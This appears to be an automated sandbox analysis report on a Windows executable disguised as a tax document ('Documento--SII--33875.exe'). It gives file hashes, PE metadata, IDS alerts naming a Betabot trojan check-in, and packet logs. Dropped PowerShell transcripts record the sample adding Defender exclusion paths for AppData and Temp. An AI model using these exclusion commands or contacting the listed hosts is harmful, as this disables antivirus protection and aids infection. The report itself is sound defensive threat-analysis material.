SSDEEP:	3:/lSll2DQi:AoMi
MD5:	DAB633BEBCCE13575989DCFA4E2203D6
SHA1:	33186D50F04C5B5196C1FCC1FAD17894B35AC6C7
SHA-256:	1C00FBA1B82CD386E866547F33E1526B03F59E577449792D99C882DEF05A1D17
SHA-512:	EDDBB22D9FC6065B8F5376EC95E316E7569530EFAA9EA9BC641881D763B91084DCCC05BC793E8E29131D20946392A31BD943E8FC632D91EE13ABA7B0CD1C626F
Malicious:	false
Preview:	........................................user.

C:\Users\user\Documents\20210310\PowerShell_transcript.226533.Y48a1ZGl.20210310114233.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	5694
Entropy (8bit):	5.382101394781873
Encrypted:	false
SSDEEP:	96:BZa//N3qDo1ZyZE//N3qDo1ZfRHZjZS//N3qDo1ZUAJJuZZ:G
MD5:	D15CC852AC45668872AB79A544C998CB
SHA1:	FB588FE3D6DCA4730F3F6044F019871BE7754080
SHA-256:	558350FA83016D5F06947E928ACB9363A3412D84E8E8951963B299F7A8945608
SHA-512:	863DBBDC30B91A6BA58A12D1A6F1E2018137DD1E4ED9CC09BD277A3E7E2CA159BE227146C5A6FDCE02C212A87C4A986504DDC093E600F266C9AD43E144283152
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210310114234..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 226533 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\'..Process ID: 5840..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210310114234..******************..PS>Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\'..********************..Windows PowerShell transcript start..Start time: 20210310114711..Username: computer\user..RunAs User: computer\user..Configuration

C:\Users\user\Documents\20210310\PowerShell_transcript.226533.gDmd_gCW.20210310114233.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	5742
Entropy (8bit):	5.38270272736976
Encrypted:	false
SSDEEP:	96:BZa//NbqDo1ZOZA//NbqDo1Z27ljjZ5//NbqDo1Z0WzzGZR:s
MD5:	E45D0C57145CE350F37E6F9A7793EEE7
SHA1:	0629D1060B01922BA18A669645CF02A3BD9E7520
SHA-256:	6C44AF999AB007997FC95A830FCE7E5FC25158E35E1D3680D33C8DD372FA9B28
SHA-512:	908CD5C99CD584ECC2B69447E5F6FE2DAB155635D8284C5A9B67A1CF2A7BB1052A61FF63653994FD3888C1D96FCFA4F3EAB7E4B9E2F41DF9EC89F8F6B3BB92C7
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210310114234..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 226533 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\'..Process ID: 4540..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210310114234..******************..PS>Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\'..********************..Windows PowerShell transcript start..Start time: 20210310114733..Username: computer\user..RunAs User: computer\user..Configur

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.888594490665969
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Documento--SII--33875.exe
File size:	852996
MD5:	2ced2c14eece71c72c5e45e8a607bb4c
SHA1:	13a700a297a7e5697d69bb743c3b256ac10a14e2
SHA256:	4efd9a3fa2d25d6706213feb3299dd0f73777aad01217b9e3df046064fdbbb7e
SHA512:	199cb38d7f20f64b30d2cb2ba56dab6c0d3b2685d85a990c085060752071b9620d131c5c25bba9b3140c9816ae3515d6b7dbf794d3dd71db15bb8d3f4eb04f06
SSDEEP:	24576:vjmBlOdjWsqxOCNsYa/xHXhOCXlt4DOShLQK:n4yWZ
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........]............................r.......................................Rich............................PE..L....BC`...........

File Icon


Icon Hash:	74ccc4d0dcdcd0d0

Static PE Info

General
Entrypoint:	0x429843
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x60434210 [Sat Mar 6 08:49:20 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	04d2817c9af4caf688e2f1cd10fe3c90

Entrypoint Preview

Instruction
jmp 00007EFEF8B64B1Dh
jmp 00007EFEF8B7A228h
jmp 00007EFEF8B8BBB3h
jmp 00007EFEF8B824AEh
jmp 00007EFEF8B8BBE9h
jmp 00007EFEF8B73544h
jmp 00007EFEF8B6B67Fh
jmp 00007EFEF8B7C18Ah
jmp 00007EFEF8B8BB45h
jmp 00007EFEF8B73390h
jmp 00007EFEF8B68D3Bh
jmp 00007EFEF8B80456h
jmp 00007EFEF8B8EBE3h
jmp 00007EFEF8B70D5Ch
jmp 00007EFEF8B8EA77h
jmp 00007EFEF8B68832h
jmp 00007EFEF8B8DBCDh
jmp 00007EFEF8B84468h
jmp 00007EFEF8B628E3h
jmp 00007EFEF8B8EA7Ch
jmp 00007EFEF8B845D9h
jmp 00007EFEF8B79564h
jmp 00007EFEF8B8489Fh
jmp 00007EFEF8B7066Ah
jmp 00007EFEF8B848B5h
jmp 00007EFEF8B70780h
jmp 00007EFEF8B8CB4Bh
jmp 00007EFEF8B893F6h
jmp 00007EFEF8B6B0C1h
jmp 00007EFEF8B70FACh
jmp 00007EFEF8B69647h
jmp 00007EFEF8B8C3F2h
jmp 00007EFEF8B79616h
jmp 00007EFEF8B72288h
jmp 00007EFEF8B81883h
jmp 00007EFEF8B7AE9Eh
jmp 00007EFEF8B8C7E9h
jmp 00007EFEF8B8B724h
jmp 00007EFEF8B8EA83h
jmp 00007EFEF8B7331Ah

Rich Headers

Programming Language:

[RES] VS2003 (.NET) build 3077
[ASM] VS2003 (.NET) build 3077
[C++] VS2003 (.NET) build 3077
[ C ] VS2003 (.NET) build 3077
[LNK] VS2003 (.NET) build 3077

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x9f000	0x28	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xa0000	0x7ac	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x7a000	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9f1f8	0x1d0	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.rdaals2	0x1000	0x270f2	0x28000	False	0.00110473632813	data	0.0	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.text	0x29000	0x506ed	0x51000	False	0.295253423997	data	5.61178432466	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x7a000	0x13334	0x14000	False	0.318933105469	data	4.38860465932	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x8e000	0x109bc	0x3000	False	0.149332682292	data	1.50156337755	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.idata	0x9f000	0xbc9	0x1000	False	0.269775390625	data	3.80824348363	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0xa0000	0x7ac	0x1000	False	0.2138671875	data	2.10865995397	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0xa00e8	0x2e8	dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 2291108088, next used block 63371
RT_GROUP_ICON	0xa03d0	0x14	data
RT_VERSION	0xa03e4	0x3c8	data	English	United States

Imports

DLL

Import

KERNEL32.dll

GetLocalTime, HeapAlloc, GetProcessHeap, GetProcAddress, LoadLibraryW, GetModuleHandleA, GetStartupInfoW, GetVersionExA, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, FatalAppExitA, HeapFree, RtlUnwind, IsBadWritePtr, IsBadReadPtr, HeapValidate, GetTimeFormatA, GetDateFormatA, GetCPInfo, TlsAlloc, GetCurrentThreadId, TlsFree, TlsSetValue, TlsGetValue, SetLastError, GetLastError, GetCurrentThread, ExitProcess, MultiByteToWideChar, GetStringTypeA, GetStringTypeW, IsValidLocale, IsValidCodePage, GetLocaleInfoA, EnumSystemLocalesA, GetUserDefaultLCID, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, GetModuleFileNameW, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetCommandLineW, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, HeapDestroy, HeapCreate, VirtualFree, GetModuleFileNameA, WriteFile, InitializeCriticalSection, VirtualAlloc, HeapReAlloc, VirtualQuery, InterlockedExchange, DebugBreak, InterlockedDecrement, OutputDebugStringA, LoadLibraryA, InterlockedIncrement, WideCharToMultiByte, GetTimeZoneInformation, VirtualProtect, GetSystemInfo, GetACP, GetOEMCP, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, SetConsoleCtrlHandler, GetLocaleInfoW, LCMapStringA, LCMapStringW, RaiseException, SetFilePointer, SetStdHandle, CompareStringA, CompareStringW, SetEnvironmentVariableA, FlushFileBuffers, CloseHandle

Version Infos

Description	Data
LegalCopyright	VDOni Helpa Kuo Siatempe
InternalName	Ahma Ob5ml Esk Eml
FileVersion	58.9.948
CompanyName	FDUs Ikrso Stop Bga
LegalTrademarks	SDo. Tiu. Eksa Ho.
Comments	SygBefgi Erko Bo Ve,
ProductName	ZSubjekto TErade Hdo Ogs
ProductVersion	58.9.948
FileDescription	EDLarinrgalo. Mern Kune Demandovorto,
OriginalFilename	Ms5io.exe
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
03/10/21-11:42:24.226293	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.5	8.8.8.8
03/10/21-11:42:27.643245	TCP	2018784	ET TROJAN Win32/Neurevt.A/Betabot Check-in 4	49715	80	192.168.2.5	212.114.52.43
03/10/21-11:42:29.589484	TCP	2021697	ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious	49716	80	192.168.2.5	104.21.55.228

Network Port Distribution

Total Packets: 106
• 443 (HTTPS)
• 80 (HTTP)
• 53 (DNS)

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 10, 2021 11:42:27.599033117 CET	49715	80	192.168.2.5	212.114.52.43
Mar 10, 2021 11:42:27.636920929 CET	80	49715	212.114.52.43	192.168.2.5
Mar 10, 2021 11:42:27.637079000 CET	49715	80	192.168.2.5	212.114.52.43
Mar 10, 2021 11:42:27.643244982 CET	49715	80	192.168.2.5	212.114.52.43
Mar 10, 2021 11:42:27.643287897 CET	49715	80	192.168.2.5	212.114.52.43
Mar 10, 2021 11:42:27.681111097 CET	80	49715	212.114.52.43	192.168.2.5
Mar 10, 2021 11:42:27.681140900 CET	80	49715	212.114.52.43	192.168.2.5
Mar 10, 2021 11:42:27.732872963 CET	80	49715	212.114.52.43	192.168.2.5
Mar 10, 2021 11:42:27.733014107 CET	49715	80	192.168.2.5	212.114.52.43
Mar 10, 2021 11:42:29.550841093 CET	49716	80	192.168.2.5	104.21.55.228
Mar 10, 2021 11:42:29.588946104 CET	80	49716	104.21.55.228	192.168.2.5
Mar 10, 2021 11:42:29.589056015 CET	49716	80	192.168.2.5	104.21.55.228
Mar 10, 2021 11:42:29.589483976 CET	49716	80	192.168.2.5	104.21.55.228
Mar 10, 2021 11:42:29.627363920 CET	80	49716	104.21.55.228	192.168.2.5
Mar 10, 2021 11:42:29.635297060 CET	80	49716	104.21.55.228	192.168.2.5
Mar 10, 2021 11:42:29.635428905 CET	49716	80	192.168.2.5	104.21.55.228
Mar 10, 2021 11:42:29.643107891 CET	49717	443	192.168.2.5	104.21.55.228
Mar 10, 2021 11:42:29.681638002 CET	443	49717	104.21.55.228	192.168.2.5
Mar 10, 2021 11:42:29.681755066 CET	49717	443	192.168.2.5	104.21.55.228
Mar 10, 2021 11:42:29.703493118 CET	49717	443	192.168.2.5	104.21.55.228
Mar 10, 2021 11:42:29.741869926 CET	443	49717	104.21.55.228	192.168.2.5
Mar 10, 2021 11:42:29.744219065 CET	443	49717	104.21.55.228	192.168.2.5
Mar 10, 2021 11:42:29.744301081 CET	443	49717	104.21.55.228	192.168.2.5
Mar 10, 2021 11:42:29.744301081 CET	49717	443	192.168.2.5	104.21.55.228
Mar 10, 2021 11:42:29.744359970 CET	49717	443	192.168.2.5	104.21.55.228
Mar 10, 2021 11:42:29.806951046 CET	49717	443	192.168.2.5	104.21.55.228
Mar 10, 2021 11:42:29.818589926 CET	49717	443	192.168.2.5	104.21.55.228
Mar 10, 2021 11:42:29.845343113 CET	443	49717	104.21.55.228	192.168.2.5
Mar 10, 2021 11:42:29.845374107 CET	443	49717	104.21.55.228	192.168.2.5
Mar 10, 2021 11:42:29.845529079 CET	49717	443	192.168.2.5	104.21.55.228
Mar 10, 2021 11:42:29.856807947 CET	443	49717	104.21.55.228	192.168.2.5
Mar 10, 2021 11:42:30.566404104 CET	443	49717	104.21.55.228	192.168.2.5
Mar 10, 2021 11:42:30.566432953 CET	443	49717	104.21.55.228	192.168.2.5
Mar 10, 2021 11:42:30.566448927 CET	443	49717	104.21.55.228	192.168.2.5
Mar 10, 2021 11:42:30.566461086 CET	443	49717	104.21.55.228	192.168.2.5
Mar 10, 2021 11:42:30.566471100 CET	443	49717	104.21.55.228	192.168.2.5
Mar 10, 2021 11:42:30.566489935 CET	443	49717	104.21.55.228	192.168.2.5
Mar 10, 2021 11:42:30.566498041 CET	443	49717	104.21.55.228	192.168.2.5
Mar 10, 2021 11:42:30.566504002 CET	49717	443	192.168.2.5	104.21.55.228
Mar 10, 2021 11:42:30.566541910 CET	49717	443	192.168.2.5	104.21.55.228
Mar 10, 2021 11:42:30.566566944 CET	49717	443	192.168.2.5	104.21.55.228
Mar 10, 2021 11:42:30.566793919 CET	443	49717	104.21.55.228	192.168.2.5
Mar 10, 2021 11:42:30.566816092 CET	443	49717	104.21.55.228	192.168.2.5
Mar 10, 2021 11:42:30.566890001 CET	49717	443	192.168.2.5	104.21.55.228
Mar 10, 2021 11:42:30.567709923 CET	443	49717	104.21.55.228	192.168.2.5
Mar 10, 2021 11:42:30.567734957 CET	443	49717	104.21.55.228	192.168.2.5
Mar 10, 2021 11:42:30.567826033 CET	49717	443	192.168.2.5	104.21.55.228
Mar 10, 2021 11:42:30.568599939 CET	443	49717	104.21.55.228	192.168.2.5
Mar 10, 2021 11:42:30.568619967 CET	443	49717	104.21.55.228	192.168.2.5
Mar 10, 2021 11:42:30.568696022 CET	49717	443	192.168.2.5	104.21.55.228
Mar 10, 2021 11:42:30.569503069 CET	443	49717	104.21.55.228	192.168.2.5
Mar 10, 2021 11:42:30.569525003 CET	443	49717	104.21.55.228	192.168.2.5
Mar 10, 2021 11:42:30.569602013 CET	49717	443	192.168.2.5	104.21.55.228
Mar 10, 2021 11:42:30.569761038 CET	49717	443	192.168.2.5	104.21.55.228
Mar 10, 2021 11:42:30.570408106 CET	443	49717	104.21.55.228	192.168.2.5
Mar 10, 2021 11:42:30.570425987 CET	443	49717	104.21.55.228	192.168.2.5
Mar 10, 2021 11:42:30.570545912 CET	49717	443	192.168.2.5	104.21.55.228
Mar 10, 2021 11:42:30.721568108 CET	443	49717	104.21.55.228	192.168.2.5
Mar 10, 2021 11:42:30.721596003 CET	443	49717	104.21.55.228	192.168.2.5
Mar 10, 2021 11:42:30.721640110 CET	443	49717	104.21.55.228	192.168.2.5
Mar 10, 2021 11:42:30.721721888 CET	443	49717	104.21.55.228	192.168.2.5
Mar 10, 2021 11:42:30.721757889 CET	49717	443	192.168.2.5	104.21.55.228
Mar 10, 2021 11:42:30.721785069 CET	49717	443	192.168.2.5	104.21.55.228
Mar 10, 2021 11:42:30.722125053 CET	443	49717	104.21.55.228	192.168.2.5
Mar 10, 2021 11:42:30.722147942 CET	443	49717	104.21.55.228	192.168.2.5
Mar 10, 2021 11:42:30.722184896 CET	49717	443	192.168.2.5	104.21.55.228
Mar 10, 2021 11:42:30.722219944 CET	49717	443	192.168.2.5	104.21.55.228
Mar 10, 2021 11:42:30.723028898 CET	443	49717	104.21.55.228	192.168.2.5
Mar 10, 2021 11:42:30.723053932 CET	443	49717	104.21.55.228	192.168.2.5
Mar 10, 2021 11:42:30.723113060 CET	49717	443	192.168.2.5	104.21.55.228
Mar 10, 2021 11:42:30.723145008 CET	49717	443	192.168.2.5	104.21.55.228
Mar 10, 2021 11:42:30.724000931 CET	443	49717	104.21.55.228	192.168.2.5
Mar 10, 2021 11:42:30.724025965 CET	443	49717	104.21.55.228	192.168.2.5
Mar 10, 2021 11:42:30.724082947 CET	49717	443	192.168.2.5	104.21.55.228
Mar 10, 2021 11:42:30.724096060 CET	49717	443	192.168.2.5	104.21.55.228
Mar 10, 2021 11:42:30.724798918 CET	443	49717	104.21.55.228	192.168.2.5
Mar 10, 2021 11:42:30.724826097 CET	443	49717	104.21.55.228	192.168.2.5
Mar 10, 2021 11:42:30.724881887 CET	49717	443	192.168.2.5	104.21.55.228
Mar 10, 2021 11:42:30.725709915 CET	443	49717	104.21.55.228	192.168.2.5
Mar 10, 2021 11:42:30.725748062 CET	443	49717	104.21.55.228	192.168.2.5
Mar 10, 2021 11:42:30.725790024 CET	49717	443	192.168.2.5	104.21.55.228
Mar 10, 2021 11:42:30.725816011 CET	49717	443	192.168.2.5	104.21.55.228
Mar 10, 2021 11:42:30.726636887 CET	443	49717	104.21.55.228	192.168.2.5
Mar 10, 2021 11:42:30.726674080 CET	443	49717	104.21.55.228	192.168.2.5
Mar 10, 2021 11:42:30.726705074 CET	49717	443	192.168.2.5	104.21.55.228
Mar 10, 2021 11:42:30.726735115 CET	49717	443	192.168.2.5	104.21.55.228
Mar 10, 2021 11:42:30.727546930 CET	443	49717	104.21.55.228	192.168.2.5
Mar 10, 2021 11:42:30.727571011 CET	443	49717	104.21.55.228	192.168.2.5
Mar 10, 2021 11:42:30.727627993 CET	49717	443	192.168.2.5	104.21.55.228
Mar 10, 2021 11:42:30.728420019 CET	443	49717	104.21.55.228	192.168.2.5
Mar 10, 2021 11:42:30.728445053 CET	443	49717	104.21.55.228	192.168.2.5
Mar 10, 2021 11:42:30.728601933 CET	49717	443	192.168.2.5	104.21.55.228
Mar 10, 2021 11:42:30.729341984 CET	443	49717	104.21.55.228	192.168.2.5
Mar 10, 2021 11:42:30.729363918 CET	443	49717	104.21.55.228	192.168.2.5
Mar 10, 2021 11:42:30.729402065 CET	49717	443	192.168.2.5	104.21.55.228
Mar 10, 2021 11:42:30.729429007 CET	49717	443	192.168.2.5	104.21.55.228
Mar 10, 2021 11:42:30.730238914 CET	443	49717	104.21.55.228	192.168.2.5
Mar 10, 2021 11:42:30.730263948 CET	443	49717	104.21.55.228	192.168.2.5
Mar 10, 2021 11:42:30.730325937 CET	49717	443	192.168.2.5	104.21.55.228
Mar 10, 2021 11:42:33.636997938 CET	49715	80	192.168.2.5	212.114.52.43

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 10, 2021 11:41:45.457556963 CET	53	62060	8.8.8.8	192.168.2.5
Mar 10, 2021 11:42:13.010899067 CET	61805	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:42:13.066914082 CET	53	61805	8.8.8.8	192.168.2.5
Mar 10, 2021 11:42:20.882999897 CET	54795	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:42:20.931772947 CET	53	54795	8.8.8.8	192.168.2.5
Mar 10, 2021 11:42:21.955091000 CET	49557	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:42:22.003865004 CET	53	49557	8.8.8.8	192.168.2.5
Mar 10, 2021 11:42:22.839747906 CET	61733	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:42:22.919651985 CET	53	61733	8.8.8.8	192.168.2.5
Mar 10, 2021 11:42:23.145108938 CET	65447	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:42:24.146101952 CET	65447	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:42:24.200372934 CET	53	65447	8.8.8.8	192.168.2.5
Mar 10, 2021 11:42:24.226169109 CET	53	65447	8.8.8.8	192.168.2.5
Mar 10, 2021 11:42:27.533092976 CET	52441	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:42:27.590620995 CET	53	52441	8.8.8.8	192.168.2.5
Mar 10, 2021 11:42:29.447962046 CET	62176	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:42:29.486794949 CET	59596	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:42:29.503112078 CET	53	62176	8.8.8.8	192.168.2.5
Mar 10, 2021 11:42:29.548923969 CET	53	59596	8.8.8.8	192.168.2.5
Mar 10, 2021 11:42:33.592852116 CET	65296	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:42:33.909949064 CET	63183	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:42:33.925044060 CET	53	65296	8.8.8.8	192.168.2.5
Mar 10, 2021 11:42:33.970722914 CET	53	63183	8.8.8.8	192.168.2.5
Mar 10, 2021 11:42:36.868185997 CET	60151	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:42:36.922789097 CET	53	60151	8.8.8.8	192.168.2.5
Mar 10, 2021 11:42:38.574233055 CET	56969	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:42:38.620115995 CET	53	56969	8.8.8.8	192.168.2.5
Mar 10, 2021 11:42:39.704246998 CET	55161	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:42:39.761579037 CET	53	55161	8.8.8.8	192.168.2.5
Mar 10, 2021 11:42:41.292442083 CET	54757	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:42:41.341227055 CET	53	54757	8.8.8.8	192.168.2.5
Mar 10, 2021 11:42:42.223999023 CET	49992	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:42:42.277993917 CET	53	49992	8.8.8.8	192.168.2.5
Mar 10, 2021 11:42:42.530456066 CET	60075	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:42:42.584700108 CET	53	60075	8.8.8.8	192.168.2.5
Mar 10, 2021 11:42:45.911041975 CET	55016	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:42:45.965420008 CET	53	55016	8.8.8.8	192.168.2.5
Mar 10, 2021 11:42:48.440924883 CET	64345	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:42:48.489754915 CET	53	64345	8.8.8.8	192.168.2.5
Mar 10, 2021 11:42:48.731410980 CET	57128	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:42:48.790709972 CET	53	57128	8.8.8.8	192.168.2.5
Mar 10, 2021 11:42:51.556493998 CET	54791	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:42:51.610935926 CET	53	54791	8.8.8.8	192.168.2.5
Mar 10, 2021 11:42:52.179197073 CET	50463	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:42:52.233701944 CET	53	50463	8.8.8.8	192.168.2.5
Mar 10, 2021 11:42:52.728647947 CET	50394	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:42:52.774983883 CET	53	50394	8.8.8.8	192.168.2.5
Mar 10, 2021 11:42:54.447309971 CET	58530	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:42:54.506834030 CET	53	58530	8.8.8.8	192.168.2.5
Mar 10, 2021 11:42:55.715934992 CET	53813	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:42:55.772545099 CET	53	53813	8.8.8.8	192.168.2.5
Mar 10, 2021 11:42:57.311022043 CET	63732	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:42:57.365310907 CET	53	63732	8.8.8.8	192.168.2.5
Mar 10, 2021 11:42:58.461935997 CET	57344	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:42:58.516541958 CET	53	57344	8.8.8.8	192.168.2.5
Mar 10, 2021 11:42:59.745594025 CET	54450	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:42:59.791768074 CET	53	54450	8.8.8.8	192.168.2.5
Mar 10, 2021 11:43:00.138197899 CET	59261	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:43:00.195586920 CET	53	59261	8.8.8.8	192.168.2.5
Mar 10, 2021 11:43:03.027340889 CET	57151	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:43:03.081782103 CET	53	57151	8.8.8.8	192.168.2.5
Mar 10, 2021 11:43:05.854348898 CET	59413	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:43:05.908895969 CET	53	59413	8.8.8.8	192.168.2.5
Mar 10, 2021 11:43:08.675479889 CET	60516	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:43:08.729815960 CET	53	60516	8.8.8.8	192.168.2.5
Mar 10, 2021 11:43:11.481430054 CET	51649	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:43:11.548894882 CET	53	51649	8.8.8.8	192.168.2.5
Mar 10, 2021 11:43:13.723664999 CET	65086	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:43:13.791376114 CET	53	65086	8.8.8.8	192.168.2.5
Mar 10, 2021 11:43:14.313855886 CET	56432	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:43:14.368622065 CET	53	56432	8.8.8.8	192.168.2.5
Mar 10, 2021 11:43:17.140939951 CET	52929	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:43:17.195389032 CET	53	52929	8.8.8.8	192.168.2.5
Mar 10, 2021 11:43:19.973582029 CET	64317	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:43:20.028006077 CET	53	64317	8.8.8.8	192.168.2.5
Mar 10, 2021 11:43:23.370452881 CET	61004	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:43:23.427532911 CET	53	61004	8.8.8.8	192.168.2.5
Mar 10, 2021 11:43:26.230215073 CET	56895	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:43:26.276403904 CET	53	56895	8.8.8.8	192.168.2.5
Mar 10, 2021 11:43:29.049068928 CET	62372	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:43:29.094966888 CET	53	62372	8.8.8.8	192.168.2.5
Mar 10, 2021 11:43:30.636250019 CET	61515	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:43:30.684978008 CET	53	61515	8.8.8.8	192.168.2.5
Mar 10, 2021 11:43:30.967895985 CET	56675	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:43:31.033087969 CET	53	56675	8.8.8.8	192.168.2.5
Mar 10, 2021 11:43:31.855731964 CET	57172	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:43:31.913132906 CET	53	57172	8.8.8.8	192.168.2.5
Mar 10, 2021 11:43:34.620337009 CET	55267	53	192.168.2.5	8.8.8.8
Mar 10, 2021 11:43:34.668447018 CET	53	55267	8.8.8.8	192.168.2.5
